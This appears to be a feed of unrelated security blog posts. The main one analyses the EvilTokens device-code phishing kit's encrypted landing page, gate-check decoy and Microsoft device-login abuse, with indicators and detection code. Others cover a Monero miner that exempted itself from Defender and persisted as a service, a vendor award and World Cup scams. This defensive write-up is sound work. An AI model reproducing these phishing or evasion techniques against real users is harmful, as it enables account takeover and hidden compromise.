EvilTokens: How “Ghost” Code Threatens US and European Businesses

EvilTokens can hide serious account takeover risk from your SOC through “ghost” code that appears only after browser-side decryption. 

As a result, static URL analysis may miss the most important part of the attack, leaving teams with incomplete evidence, slower triage, and longer exposure to a potential Microsoft 365 compromise. 

Full browser-level inspection closes this gap by revealing how the page behaves after execution in a dynamic environment. This gives teams the evidence they need to validate the threat and respond faster. 

Key Takeaways 

  • EvilTokens hides key parts of its phishing flow behind browser-side decryption, creating a visibility gap for static URL analysis. 
  • The kit abuses Microsoft’s legitimate device login flow to gain account access without directly stealing the victim’s password. 
  • Browser-level evidence helps SOC teams reduce manual checks, avoid unnecessary escalations, and make faster containment decisions. 
  • Threat Intelligence pivots connect one EvilTokens session to related phishing kits, infrastructure, indicators, and wider device-code phishing activity. 
  • Decrypted code and behavioral patterns can also support stronger phishing signatures, threat hunting, and custom detection rules. 

EvilTokens Targeting: Regions and Industries at Risk 

According to ANY.RUN Threat Intelligence data, recent EvilTokens activity is concentrated mainly in the United States and Europe. 

View recent EvilTokens activity in ANY.RUN Threat Intelligence 

EvilTokens targeting specific industries

The kit has been observed targeting organizations in: 

  • Managed security services 
  • Technology 
  • Manufacturing 
  • Education
  • Banking
  • Consulting and financial services 

These findings show that EvilTokens is aimed largely at organizations where access to a single Microsoft 365 account can expose sensitive data, internal communications, and connected business services. 

Why EvilTokens Creates a Blind Spot for SOC Teams 

EvilTokens continues to rank among the most frequently observed phishing kits in ANY.RUN’s weekly threat reports. 

A recent analysis session showed how the kit uses Microsoft Device Code Phishing to compromise accounts without stealing credentials directly. Instead, it convinces the victim to complete Microsoft’s legitimate device login flow and unknowingly authorize access to their account. 

Check analysis session with recent EvilTokens attack 

Recent EvilTokens attack analyzed inside ANY.RUN sandbox 

What makes the attack difficult to investigate is the way it hides its phishing content. The landing page HTML is encrypted with AES-GCM and becomes visible only after the browser decrypts it and renders it in the DOM. 

Static URL checks and network-level detection may therefore capture the initial response without showing what the victim actually sees in the browser. This can leave SOC teams with an incomplete verdict, force additional manual checks, trigger unnecessary escalations, and delay containment.

This visibility gap becomes a business risk. When SOC teams cannot see what a suspicious page does after browser execution, the impact goes beyond a slower investigation. It can lead to: 

  • Longer exposure to potential Microsoft 365 account takeover 
  • Delayed containment and response decisions 
  • More alerts escalated to senior security staff 
  • Higher investigation workload and operational costs 
  • Incomplete evidence for blocking related infrastructure 
  • Greater risk of unauthorized access to corporate data and services 

To validate the threat quickly, teams need visibility into what happens after the page begins running. In the following walkthrough, we use ANY.RUN’s in-browser data inspection to uncover the decrypted page, trace the requests behind the device-code flow, and collect evidence for response and further detection. 

With in-browser data inspection inside ANY.RUN’s Interactive Sandbox, investigators can examine cases like this across several layers:

HTML DOM Changes: Tracks changes to the DOM over time and allows investigators to compare different snapshots of the same page. It highlights byte-level differences from the previous DOM state, making it easier to identify the exact moment when the decrypted phishing page appears. 

HTTP Requests: Provides visibility into browser-level network activity, including requests involving HTML, JavaScript, Fetch/XHR, scripts, static assets, binary files, archives, and other request categories. 

URL Details: Displays the final URL and domain, SSL certificate information, DNS A records, request statistics, and triggered detection signatures. 

Indicators: Collects indicators of compromise associated with the page, including top-level domains, subdomains, URL endpoints, file hashes, IP addresses, and ASN information. 

Triage Walkthrough Using Browser Data 

The network traffic shows that EvilTokens delivers the landing page in an HTTP response encrypted with AES-GCM: 

EvilTokens HTTP response body containing the AES-GCM-encrypted landing page

The decrypted HTML DOM of the page can be viewed in the Browser Data panel: 

In-browser data investigation panel inside the interactive sandbox 

Here, you can view snapshots of the DOM structure after the AES-GCM-encrypted code has been decrypted:

DOM snapshots displayed with decrypted code 

The HTML DOM Changes fields contain the following information: 

  • Timeshift: The time elapsed from the start of the analysis when the DOM snapshot was captured. 
  • Score: The risk level assigned to that particular state of the page. As shown in the screenshot, the score is 100, which corresponds to the signatures triggered by that DOM state. 
  • Size diff: The change in DOM size compared with the previous snapshot. 
  • Size: The size of the current DOM snapshot. 
  • Page: The domain associated with the snapshot. 

The value that should draw your attention most is the green +48-byte size diff. By selecting the fourth snapshot, you can see which line was removed and which line was added compared with the previous snapshot: 

Check line changes to see the codes added and removed 
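The snapshot comparison described above (size, size diff, and the lines added or removed between consecutive DOM states) can be reproduced on any series of captured DOMs. The block below is an added example and not ANY.RUN's code: the snapshot contents are constructed for illustration, and the shape of a user code (a short uppercase alphanumeric token next to a device-login reference) is an assumption made for the example, not a documented Microsoft format.

```python
"""Compare successive DOM snapshots the way the HTML DOM Changes panel does (size,
size diff, lines added/removed) and flag the snapshot in which a device-login user
code first appears. Added example; the snapshot content is constructed and is not
the EvilTokens page."""
import difflib
import re

# Constructed snapshots: (timeshift in seconds since analysis start, page domain, DOM text).
_BASE = ["<html>", "<body>", '<div id="app">', "<p>Loading secure document</p>",
         "</div>", "</body>", "</html>"]
_S2 = _BASE[:4] + ['<div id="code"></div>'] + _BASE[4:]
_S3 = [ln.replace("<p>Loading secure document</p>",
                  "<p>Sign in with the code below at microsoft.com/devicelogin</p>") for ln in _S2]
_S4 = [ln.replace('<div id="code"></div>', '<div id="code">ABCD1EFGH</div>') for ln in _S3]
SNAPSHOTS = [
    (0.8, "landing.example", "\n".join(_BASE)),
    (1.4, "landing.example", "\n".join(_S2)),
    (2.1, "landing.example", "\n".join(_S3)),
    (2.7, "landing.example", "\n".join(_S4)),
]

# Assumed shape of a device-login user code: a short uppercase alphanumeric token.
# This is an assumption for the example, not a documented Microsoft format.
USER_CODE_RE = re.compile(r"\b[A-Z0-9]{8,9}\b")


def snapshot_table(snapshots):
    """One row per snapshot with the panel's fields (score omitted): timeshift,
    page, size in bytes, and size diff against the previous snapshot."""
    rows, prev_size = [], None
    for ts, page, dom in snapshots:
        size = len(dom.encode("utf-8"))
        rows.append({"timeshift": ts, "page": page, "size": size,
                     "size_diff": None if prev_size is None else size - prev_size})
        prev_size = size
    return rows


def line_diff(prev_dom, curr_dom):
    """Lines removed from and added to the DOM between two snapshots."""
    removed, added = [], []
    for entry in difflib.ndiff(prev_dom.splitlines(), curr_dom.splitlines()):
        if entry.startswith("- "):
            removed.append(entry[2:])
        elif entry.startswith("+ "):
            added.append(entry[2:])
    return removed, added


def first_user_code_snapshot(snapshots, code_re=USER_CODE_RE):
    """Index, timeshift and code of the first snapshot whose *added* lines carry a
    code-like token while the page also references the device-login URL."""
    for i in range(1, len(snapshots)):
        if "devicelogin" not in snapshots[i][2].lower():
            continue
        _, added = line_diff(snapshots[i - 1][2], snapshots[i][2])
        for line in added:
            match = code_re.search(line)
            if match:
                return {"index": i, "timeshift": snapshots[i][0], "code": match.group(0)}
    return None


if __name__ == "__main__":
    for row in snapshot_table(SNAPSHOTS):
        print(row)
    print(first_user_code_snapshot(SNAPSHOTS))
```

Requiring the code token to appear in the added lines, rather than anywhere in the DOM, is what pins the event to a single snapshot and timeshift, which is the value later compared against the HTTP request timeline.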

Looking at the Render panel on the left, we can confirm that a user code has appeared on the page. The attackers will later use this code to take over the victim’s Microsoft 365 account: 

Render of the page

This suggests that the landing page dynamically requested the user code from the backend through a Fetch/XHR request. The request can be examined in the HTTP Requests tab: 

HTTP Requests panel inside the Browser Data  

By comparing the Timeshift values of the HTTP request and the DOM snapshot, we can conclude that the user code was obtained through a request to the /api/device/start endpoint. Clicking the URL confirms this:

HTTP response from EvilTokens

Pivoting from One EvilTokens Session to Broader Threat Activity

The findings from a single analysis session can be used to uncover related phishing infrastructure and activity.

Start with URL Details, where the code exposed in the DOM triggered the Microsoft OAuth device-code phishing signature.  

URL details displayed inside ANY.RUN sandbox 

Searching for this signature in ANY.RUN’s Threat Intelligence reveals other phishing resources that use similar code patterns:  

TI Query: ruleName:"^Microsoft OAuth device-code phishing has been detected$"

Search for analysis sessions that triggered the “Microsoft OAuth device-code phishing has been detected” signature

The results show that this behavior is not unique to EvilTokens. Other phishing kits use similar code and techniques, allowing teams to move beyond one isolated case and identify a broader set of related threats.

To narrow the search specifically to EvilTokens, use the following query: threatName:"eviltokens" 

Threat Intelligence data shows that recent EvilTokens activity is concentrated mainly in the United States and Europe: 

Threat activity targeting specific regions

Teams can also track device code phishing activity more broadly using the oauth-ms-phish threat tag:  

TI Query: threatName:"oauth-ms-phish" 

Indicators displayed for broader analysis

This wider search helps teams identify related campaigns even when they are associated with a different phishing kit or infrastructure.

Next, return to Browser Data and open the Indicators tab: 

Not every artifact collected during the analysis should be added to detection rules. For example, the observed IP address belongs to the CloudflareNet autonomous system. Blocking or detecting this shared infrastructure could produce false positives and affect legitimate services. 

More specific indicators from the session, including the domain, URI, and hash, are stronger candidates for further validation and detection: 

TI Query: url:"/api/device/start" or domainName:"emp01825.workers.dev$" or md5:"fcd1b654a0b3e8f85ca7cfdafe494d4b" 

ANY.RUN Threat Intelligence query using indicators extracted from in-browser data 
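The indicator triage above (drop shared infrastructure, keep the domain, URI and hash, then query on them) is easy to codify so that analysts apply the same rule every time. The following is an added example, not ANY.RUN tooling: the shared-ASN list beyond CloudflareNet, the legitimate-domain list and the IP address are assumptions, and the query syntax simply follows the queries shown in this article.

```python
"""Pick session indicators that are specific enough for detection, drop shared
infrastructure and legitimate services, and build the Threat Intelligence query.
Added example, not ANY.RUN code."""

# Constructed: autonomous systems that host many unrelated tenants. Only CloudflareNet
# is named in the article; the other entries are assumptions.
SHARED_ASNS = {"CLOUDFLARENET", "AMAZON-02", "GOOGLE"}

# Constructed: first-party services the device-code flow legitimately contacts.
LEGITIMATE_DOMAINS = {"microsoft.com", "login.microsoftonline.com"}

# Constructed indicator list in the shape of the Indicators tab. Domain, URI and MD5 are
# the article's own query values; the IP is a documentation-range placeholder.
INDICATORS = [
    {"type": "ip", "value": "203.0.113.10", "asn": "CLOUDFLARENET"},
    {"type": "domain", "value": "login.microsoftonline.com"},
    {"type": "domain", "value": "emp01825.workers.dev"},
    {"type": "url", "value": "/api/device/start"},
    {"type": "md5", "value": "fcd1b654a0b3e8f85ca7cfdafe494d4b"},
]

# Query field per indicator type, as used in the article's queries. The domain value is
# anchored with "$" exactly as the article does. No IP field is shown in the article, so
# IPs that survive the ASN check are left for manual review rather than queried.
FIELD_BY_TYPE = {"url": 'url:"{v}"', "domain": 'domainName:"{v}$"', "md5": 'md5:"{v}"'}
QUERY_ORDER = ["url", "domain", "md5"]


def _is_legitimate(domain):
    d = domain.lower()
    return any(d == ld or d.endswith("." + ld) for ld in LEGITIMATE_DOMAINS)


def select_indicators(indicators):
    """Split indicators into (kept, dropped); each dropped entry carries a reason."""
    kept, dropped = [], []
    for ind in indicators:
        if ind["type"] == "ip" and ind.get("asn", "").upper() in SHARED_ASNS:
            dropped.append((ind, "shared infrastructure ASN; blocking would cause false positives"))
        elif ind["type"] == "domain" and _is_legitimate(ind["value"]):
            dropped.append((ind, "legitimate first-party service"))
        elif ind["type"] not in FIELD_BY_TYPE:
            dropped.append((ind, "no query field shown for this type; review manually"))
        else:
            kept.append(ind)
    return kept, dropped


def build_ti_query(kept):
    """Join the kept indicators with 'or' in a fixed field order."""
    parts = [FIELD_BY_TYPE[i["type"]].format(v=i["value"])
             for t in QUERY_ORDER for i in kept if i["type"] == t]
    return " or ".join(parts)


if __name__ == "__main__":
    kept, dropped = select_indicators(INDICATORS)
    for ind, reason in dropped:
        print("dropped", ind["type"], ind["value"], "->", reason)
    print(build_ti_query(kept))
```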

By pivoting on signatures, threat names, tags, and carefully selected IOCs, teams can connect an individual alert to wider phishing activity, improve detection coverage, and respond proactively to related attacks. 

Breaking Down the EvilTokens Attack Logic 

The HTML DOM Changes view is useful not only for triage but also for deeper code analysis. By examining the decrypted page logic, teams can identify recurring patterns that may support low-level phishing detection rules. 

The following code shows the device code flow configuration: 

Device code flow configuration

Gate Check and Decoy Delivery 

The first fragment shows the client sending a gate check request to: 

/api/device/gate/<PAGE_ID> 

The backend returns a killed flag that determines what happens next. If the phishing flow remains active, the attack continues. Otherwise, the victim is shown a decoy page designed to resemble a Microsoft error or expired-link message. 

EvilTokens gate check logic 

This mechanism allows operators to disable the phishing page or hide its true behavior when certain visitors or conditions are detected. 

Requesting and Displaying the User Code 

The next fragment sends a POST request to _startUrl: 

/api/device/start 

The backend returns the userCode, sessionId, and verification URI. The script then stores the session, constructs _verificationUrl, and writes the user code into the DOM for the victim. 

Code used to request the user code

This is the same activity observed earlier in the HTTP Requests view, connecting the browser-side code directly to the network request and the user code displayed on the page. 

Monitoring the Device-Code Session 

The frontend then checks the status of the device-code session through: 

/api/device/status/{sessionId} 

It repeatedly sends GET requests containing the current sessionId and receives the latest status from the backend. 

Once the status changes to completed, the script stops polling, displays a success screen, and redirects the victim to the legitimate OneDrive website. 

Authorization status polling

This final redirect helps the attack appear successful and legitimate, while the attackers retain the access authorized through the completed Microsoft device login flow. 

By connecting the decrypted DOM code with browser requests and visible page changes, teams can reconstruct the full phishing logic and identify code patterns, endpoints, and behaviors that may strengthen future detection. 
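Two of the steps just described lend themselves to a small correlation script: matching the HTTP request timeshift against the DOM snapshot in which the user code appeared (the /api/device/start finding from the triage walkthrough), and checking whether a session's request sequence follows the gate check, start call and status polling described in this section. The block below is an added example and not ANY.RUN's code; the request log, the snapshot timeline, the host and the session id are constructed, while the endpoint shapes are the ones named in the article.

```python
"""Tie browser-level HTTP requests to DOM snapshots and test the request sequence
against the gate -> start -> status-polling pattern of the device-code flow.
Added example, not ANY.RUN code; the log, snapshots and session id are constructed."""
import re
from urllib.parse import urlparse

# Constructed request log shaped like the HTTP Requests tab:
# (timeshift in seconds, method, category, url). The host is a placeholder.
REQUESTS = [
    (0.5, "GET", "HTML", "https://landing.example/d/abc123"),
    (0.9, "GET", "Script", "https://landing.example/static/app.js"),
    (1.2, "GET", "Fetch/XHR", "https://landing.example/api/device/gate/abc123"),
    (2.4, "POST", "Fetch/XHR", "https://landing.example/api/device/start"),
    (4.0, "GET", "Fetch/XHR", "https://landing.example/api/device/status/sess-9f1"),
    (6.0, "GET", "Fetch/XHR", "https://landing.example/api/device/status/sess-9f1"),
    (8.0, "GET", "Fetch/XHR", "https://landing.example/api/device/status/sess-9f1"),
]

# Constructed DOM timeline: (timeshift, user code visible in that snapshot, or None).
SNAPSHOTS = [(0.8, None), (1.4, None), (2.1, None), (2.7, "ABCD1EFGH")]

# Endpoint shapes taken from the decrypted page logic described in the article.
GATE_RE = re.compile(r"^/api/device/gate/[^/]+$")
START_PATH = "/api/device/start"
STATUS_RE = re.compile(r"^/api/device/status/(?P<sid>[^/]+)$")


def request_behind_code(requests, snapshots):
    """Latest Fetch/XHR request issued between the last code-free snapshot and the
    first snapshot that shows a user code; None if no code ever appears."""
    code_idx = next((i for i, (_, code) in enumerate(snapshots) if code), None)
    if code_idx is None:
        return None
    code_ts = snapshots[code_idx][0]
    prev_ts = snapshots[code_idx - 1][0] if code_idx > 0 else 0.0
    window = [r for r in requests if r[2] == "Fetch/XHR" and prev_ts < r[0] <= code_ts]
    return max(window, key=lambda r: r[0]) if window else None


def classify_device_code_flow(requests):
    """Summarise gate check, start call and status polling, and report whether the
    three occur in order with at least two polls on a single session id."""
    gate_ts = start_ts = None
    polls = {}  # session id -> timeshifts of status polls
    for ts, method, _, url in requests:
        path = urlparse(url).path
        if gate_ts is None and GATE_RE.match(path):
            gate_ts = ts
        elif start_ts is None and method == "POST" and path == START_PATH:
            start_ts = ts
        else:
            match = STATUS_RE.match(path)
            if match and method == "GET":
                polls.setdefault(match.group("sid"), []).append(ts)
    in_order = (gate_ts is not None and start_ts is not None and gate_ts < start_ts
                and any(len(v) >= 2 and min(v) > start_ts for v in polls.values()))
    return {
        "gate": gate_ts is not None,
        "start": start_ts is not None,
        "session_ids": sorted(polls),
        "status_polls": sum(len(v) for v in polls.values()),
        "matches": in_order,
    }


if __name__ == "__main__":
    print(request_behind_code(REQUESTS, SNAPSHOTS))
    print(classify_device_code_flow(REQUESTS))
```

Bounding the candidate window by the last snapshot without a code keeps an earlier, unrelated Fetch/XHR request (such as the gate check) from being blamed for the code. The ordering check in the classifier mirrors the sequence the page logic enforces, which makes it a reasonable basis for a behavioural signature that is not tied to a single hostname.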

Turning Hidden Browser Activity into Faster SOC Decisions 

The EvilTokens investigation shows the practical value of browser-level evidence. Instead of stopping at the encrypted HTTP response, teams can see the decrypted DOM, identify the request that generated the user code, trace the device-code session, and extract artifacts for detection and threat hunting. 

Benefits of browser-level evidence

This improves the investigation workflow in several ways: 

Faster triage and fewer unnecessary escalations: Tier 1 analysts can validate suspicious URLs using direct browser-level evidence rather than relying on incomplete indicators. This reduces uncertainty, speeds up verdicts, and keeps more benign cases from reaching senior teams.

Smoother handoff and faster response: When escalation is necessary, Tier 2 receives the full attack context, including DOM changes, HTTP requests, triggered signatures, rendered content, and relevant indicators. This reduces repeated work and supports faster containment decisions. 

Stronger detection engineering: Decrypted page code, browser requests, endpoints, and behavioral patterns provide useful material for custom phishing signatures, hunting hypotheses, and detection rules based on observed attacker behavior. 

More focused threat hunting: Teams can pivot from one EvilTokens session to related domains, code patterns, phishing kits, and device-code attacks in ANY.RUN’s Threat Intelligence, expanding the investigation beyond a single URL. 

Clearer reporting: Structured investigation results turn complex browser activity into evidence that is easier to use during triage, escalation, incident response, and stakeholder communication.

For SOC and MSSP teams, this means less time spent reconstructing browser activity manually, better use of senior resources, and a faster path from a suspicious URL to a confident response decision. 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps SOC teams, MSSPs, and enterprises investigate threats faster and make more confident security decisions. 

Its cloud-based Interactive Sandbox lets teams safely analyze suspicious files, URLs, and emails in real time, observe malicious behavior as it unfolds, and collect clear evidence for faster response. 

ANY.RUN’s Threat Intelligence solutions add broader context around threats, infrastructure, and attacker activity. Together, these capabilities support faster triage, stronger detection, better-informed response decisions, and more efficient security operations at scale. 

The post EvilTokens: How “Ghost” Code Threatens US and European Businesses appeared first on ANY.RUN’s Cybersecurity Blog.


How Hola Browser was weaponized to spread a Monero miner | Kaspersky official blog

In early June, cybersecurity researchers discovered that a compromised version of the Israel-based Hola Browser for Windows (version 1.251.91.0) was secretly downloading a Monero crypto miner to users’ devices. Shortly after the discovery, Hola confirmed that it had fallen victim to a supply chain attack. In this article, we break down how the attack went down, how the crypto miner works, and what it means for affected users.

What is Hola Browser, and how was the malware discovered?

The Israeli company Hola is best known for its VPN service, which users primarily rely on to bypass geo-restrictions and access region-locked content. In addition to the VPN, the company develops Hola Browser — a Chromium-based browser that comes with built-in VPN and proxy features.

Researchers first spotted signs of trouble during a standard compliance check for the AppEsteem Windows Certified Application program. As part of this certification process, independent cybersecurity firms audit software to ensure it only contains the components it claims to have and is free of unwanted or malicious features. Even after a certificate is granted, apps are regularly re-evaluated to ensure they continue to meet AppEsteem’s strict guidelines.

It was during one of these routine follow-up checks that experts noticed an unauthorized file bundling itself with version 1.251.91.0 of Hola Browser for Windows. Once installed, the file saved itself to the hard drive at C:\Program Files\Hola\me{.}exe. The file immediately raised red flags for researchers due to a laundry list of suspicious characteristics: it wasn’t on the list of approved application files, lacked a timestamp, and had no digital signature. On top of that, its code was heavily obfuscated, and it possessed the ability to inject itself directly into system memory.

Interestingly, researchers noted that the file didn’t show up in every single installation. Because the infection wasn’t widespread across all users, experts suspected early on that a specific stage in the Hola Browser distribution pipeline had been compromised. Hola later confirmed this theory, admitting it had fallen victim to a supply chain attack.

As for the suspicious me{.}exe file itself, closer analysis revealed that it was a stealthy crypto miner configured to mine Monero. We’ll now dive into the technical details of how it works.

How did attackers use Hola Browser to mine Monero?

Crypto miners are programs that harness a computer’s processing power to mine cryptocurrency. While some users install this software intentionally to generate a bit of income, miners that run on a machine without the owner’s knowledge are typically classified as unwanted.

Running a hidden miner can noticeably slow down the device, spike the user’s electricity bill, and shorten the hardware’s lifespan. That being said, it’s worth noting that a crypto miner infection will not actually steal the owner’s cryptocurrency; the damage is strictly limited to the hijackers leeching your computer’s hardware resources to line their own pockets.

As we mentioned above, the malicious download bundled with Hola Browser sneaked a Monero crypto miner onto victims’ devices. Launched in 2014 and built on the CryptoNote protocol, Monero currently trades at around US$330 per coin.

Compared to heavyweights like Bitcoin or Ethereum, Monero is a bit exotic and lesser-known to the general public. This niche status shows in its relatively modest price growth and smaller market capitalization — which is roughly 200 times lower than Bitcoin’s. However, Monero has one defining feature: privacy. While Bitcoin and Ethereum operate on fully transparent, public blockchains, where anyone can trace transactions, Monero is a “privacy coin”. It uses advanced cryptographic mechanisms to mask the sender, receiver, and transaction amounts. This extreme anonymity is exactly why hackers love hidden Monero miners — it makes it difficult for law enforcement and cybersecurity professionals to follow the money trail.

Additionally, Monero’s underlying algorithm is explicitly designed to mine efficiently using standard computer processors (CPUs). This stands in stark contrast to many other popular cryptocurrencies, which require specialized ASIC hardware or high-end graphics cards (GPUs) to be profitable.

But let’s look closer at how this played out with Hola Browser. When researchers dissected the malicious me{.}exe code, they found it was automatically adding its own files to the Microsoft Defender exclusion list. By allowlisting itself, the malware successfully blinded Windows’ built-in antivirus, allowing the crypto miner to run in the background completely unhindered.

Once inside, the program made a copy of itself under the name HolaMonitorService{.}exe, and set up a persistent Windows background service called hola_monitor_svc. This maneuver allowed the malware to entrench itself in the system, automatically launching every time the computer restarted. To avoid raising any red flags with sudden massive performance drops, the miner was programmed to stay dormant, kicking into gear only when the computer was idle.
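The two persistence tricks just described, a self-added Microsoft Defender exclusion and an auto-start service, leave traces an endpoint audit can look for: an exclusion entry that points at an unsigned binary, and an auto-start service whose executable lives inside an excluded path. The block below is an added example, not Kaspersky's or Hola's code; the inventory it inspects is constructed in the shape such an audit would collect (file paths and names follow the article, the signature and timestamp flags are assumed for illustration), so it runs offline.

```python
"""Audit a collected endpoint inventory for the pattern described in the article:
Defender exclusions covering unsigned binaries, and auto-start services that run from
an excluded, unsigned path. Added example; the inventory below is constructed."""

# Constructed Defender exclusion entries (file paths and one folder).
EXCLUSIONS = [
    r"C:\Program Files\Hola\me.exe",
    r"C:\Program Files\Hola\HolaMonitorService.exe",
    r"C:\Dev\build",  # a developer folder exclusion, treated as benign here
]

# Constructed file metadata as an audit would record it; signed/timestamped flags are assumed.
FILES = {
    r"C:\Program Files\Hola\me.exe": {"signed": False, "timestamped": False},
    r"C:\Program Files\Hola\HolaMonitorService.exe": {"signed": False, "timestamped": False},
    r"C:\Windows\System32\spoolsv.exe": {"signed": True, "timestamped": True},
}

# Constructed service list: name, executable path, start type.
SERVICES = [
    {"name": "hola_monitor_svc", "binary": r"C:\Program Files\Hola\HolaMonitorService.exe", "start": "auto"},
    {"name": "Spooler", "binary": r"C:\Windows\System32\spoolsv.exe", "start": "auto"},
]


def _norm(path):
    """Case-insensitive, backslash-normalised path without a trailing separator."""
    return path.replace("/", "\\").rstrip("\\").lower()


def is_excluded(path, exclusions):
    """True if the path is itself an exclusion or sits below an excluded folder."""
    p = _norm(path)
    return any(p == _norm(e) or p.startswith(_norm(e) + "\\") for e in exclusions)


def audit(exclusions, files, services):
    """Return (finding_type, subject) tuples for the suspicious combinations."""
    findings = []
    for entry in exclusions:
        meta = files.get(entry)
        if meta is not None and not meta["signed"]:
            findings.append(("unsigned_excluded_binary", entry))
    for svc in services:
        meta = files.get(svc["binary"], {})
        if (svc["start"] == "auto" and is_excluded(svc["binary"], exclusions)
                and not meta.get("signed", False)):
            findings.append(("autostart_service_from_excluded_unsigned_binary", svc["name"]))
    return findings


if __name__ == "__main__":
    for kind, subject in audit(EXCLUSIONS, FILES, SERVICES):
        print(kind, subject)
```

Folder exclusions are matched by prefix so that a service binary dropped into an excluded directory is caught even when the exclusion entry names the folder rather than the file; signed binaries under an exclusion are deliberately not reported, since developer and backup software legitimately uses such entries.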

How to protect your device from crypto miners and malware

To their credit, Hola’s development team responded swiftly to the initial reports of the suspicious file. They confirmed the supply chain breach, but stated that the incident only impacted 0.1% of their user base. The company has since tightened up security around its update distribution pipeline to guarantee that users only receive approved, certified, and digitally-signed software components moving forward.

In light of this incident, we highly recommend that all Hola Browser users update to the latest version immediately — especially those running the application on Windows.

More broadly, this situation is a textbook reminder of why it’s so critical to keep all your software up to date and run a robust cybersecurity solution on all your gadgets. For instance, Kaspersky Premium provides real-time alerts about suspicious software behavior and blocks threats instantly. As an added bonus, a Kaspersky Premium subscription includes a secure and reliable VPN.

Don’t forget that malicious crypto miners don’t just target PCs; they also go after smartphones, often disguising themselves as anything from popular mobile games to official government service apps. Check out our previous posts to learn more:


The Hacker News Recognizes ANY.RUN as the Best Security Investigation Platform 2026 

ANY.RUN has been recognized as the Best Security Investigation Platform 2026 at the Cybersecurity Stars Awards by The Hacker News. 

This award reflects our dedication to building solutions that make a real impact on daily security operations. 

At ANY.RUN, we help SOC and MSSP teams worldwide streamline threat investigation workflows through confident decision-making, full malware and phishing visibility, and actionable insights that accelerate incident investigations and response. 

We thank our global community of security professionals for continuously trusting our solutions and supporting our growth! 

Reinforcing Our Position as a Market Leader 

The Cybersecurity Stars Awards are organized by The Hacker News, one of the industry’s leading cybersecurity publications, delivering industry news, threat intelligence insights, and practical security guidance to more than 50 million security professionals annually. 

The award recognizes companies and individuals who have demonstrated excellence in cybersecurity through innovation, impact, and technical achievement. 

As the organizers noted: 

“[ANY.RUN’s] work helps SOC and MSSP teams move faster in the critical moments when every second counts in threat investigation.” 

This recognition reflects our mission to simplify complex investigations and help security teams in companies and organizations accelerate detection, analysis, and response at scale. 

Delivering Innovation for Measurable Impact 

Insights from ANY.RUN users on their improved metrics

Winners were selected by an independent panel of cybersecurity experts based on criteria including innovation, industry impact, and technical excellence. At ANY.RUN, we translate these principles into tangible business outcomes for security teams: 

  • Greater operational efficiency with automated enrichment and streamlined investigation processes. 
  • Confident incident response backed by actionable intelligence from investigations by 15,000+ security teams. 


Recent Releases Driving SOC Investigations Forward 

ANY.RUN’s enterprise-ready solutions are designed to meet the needs of modern SOC and MSSP environments. Our recent releases reinforce this mission by delivering: 

  • Fast, evidence-based decision-making through in-browser data inspection, enabling analysts to perform URL analysis without switching between multiple tools or workflows. 
  • Consistent and efficient investigations with SOC-ready reporting that converts analysis outputs into structured, operationally ready documents. 

About ANY.RUN 

ANY.RUN provides cybersecurity solutions for SOC and MSSP teams that enable stronger operations across threat investigation workflows.  

Interactive Sandbox for enterprise-scale malware and phishing analysis and ANY.RUN Threat Intelligence solutions aggregate investigation data from more than 15,000 SOCs worldwide to support instant enrichment and early threat detection.   

The company’s mission is to deliver fast threat understanding and confident incident response.  

ANY.RUN is SOC 2 Type II attested and committed to strong security control and customer data protection. 

The post The Hacker News Recognizes ANY.RUN as the Best Security Investigation Platform 2026 appeared first on ANY.RUN’s Cybersecurity Blog.


Killing me gently: Inside Gentlemen’s EDR killer framework

ESET Research shares the results of a months-long investigation into the suite of EDR killers maintained by the RaaS gang Gentlemen

WeLiveSecurity

World Cup 2026: watch out for these scams | Kaspersky official blog

The World Cup attracts a great many fans — but also a great many scammers. While millions of fans tune in to watch the matches, cybercriminals are hard at work trying to get at their money and personal data. In fact, we’ve already flagged more than 336 fake websites designed to look exactly like the official World Cup page! As the biggest sporting event of the year heats up, here are the top red flags you need to watch out for.

Totally Legit Free Streams (No Scam)

Scoring a seat at WC26 has turned into quite the mission. Soccer fans are furious over ticket prices, which have officially been dubbed the highest in World Cup history. On top of lodging and travel costs, the situation is made even worse by America’s stringent immigration policies — where referees, team staff, and even players have faced major visa and entry headaches. But fans still want to watch the games, and that’s exactly where fake streaming platforms step in to “help”.

Here’s how the scam plays out: cybercriminals set up fake websites promising free access to World Cup match streams. But the moment you click Watch Now, you’re prompted to sign up and then pay for “lifetime access” to the entire tournament. In the example below, they’re asking for cryptocurrency — which is still a bit unusual, since scammers typically prefer good old-fashioned bank cards.

An example of a fake video streaming website requiring users to register and pay with cryptocurrency to watch all World Cup 2026 matches


Fans who are desperate to catch their favorite teams live risk losing not just their money, but also their personal data, which hackers can later weaponize in targeted phishing attacks.

A losing bet

Match result predictions and sports betting always skyrocket in popularity during the World Cup, and scammers waste no time cashing in on the trend. And behind the flashy slogans lie classic scam tactics.

Take this beautifully designed Spanish-language website. To sign up, it demands a massive amount of personal information, including your full name, national ID number, email address, and phone number — and, of course, it asks you to create a password. If a victim uses the exact same password for multiple accounts, they’re essentially handing the keys to their digital life over to cybercriminals.

To guess match outcomes on this site, you have to hand over way too much personal info — everything short of biometrics


Another site, specifically targeting users in Colombia, turned the sign-up process into a paid ordeal — and it features every trick in the book.

  • To “verify” your profile, you’re forced to use WhatsApp under the guise of avoiding legal complications.
  • Before your account is activated, you must make a deposit. This means sending 100 000 Colombian pesos (about $29) to a specified account and texting the receipt to an “administrator” on WhatsApp.
  • Next, you’re told to wait 12 hours for the “administrator” to manually activate your profile.
  • Only after all of this do the scammers tell you that you can place unlimited bets (which is, of course, not true).

These scammers built a whole website, but they do all their business over WhatsApp. That’s a red flag!

In many countries — including Colombia — sports betting is strictly regulated. Only a handful of licensed operators are legally allowed to run these sites, and users are required by law to verify their identity. Because of this, these shady workarounds can look tempting to people who love to gamble but don’t want to — or can’t — go through the official verification process.

Unfortunately, the scammers always win in this scenario. They walk away with your initial deposit and every single bet you place on their site. At the end of the day, their only real goal is to drain their victims’ wallets for as much as they possibly can.

Discounts for collectors!

The World Cup isn’t just about the matches; it also drives record-breaking sales of collectible merchandise — stickers, scarves, team jerseys, official match balls, and more. Naturally, plenty of scammers are eager to get a piece of that action.

Take a look at this website offering “exclusive, limited-edition” stickers and albums. Notice anything suspicious?

Talk about a steal! Too bad the whole website is a scam


Check out those prices: everything is heavily discounted, even though the tournament is in full swing. All it takes is a quick price check against the real deal to spot the trap. In the screenshot above, the scammers are charging 67 euros for a sticker collection. On actual online marketplaces, that exact same set goes for at least twice as much, and on the official Panini website, it’s three times the price.

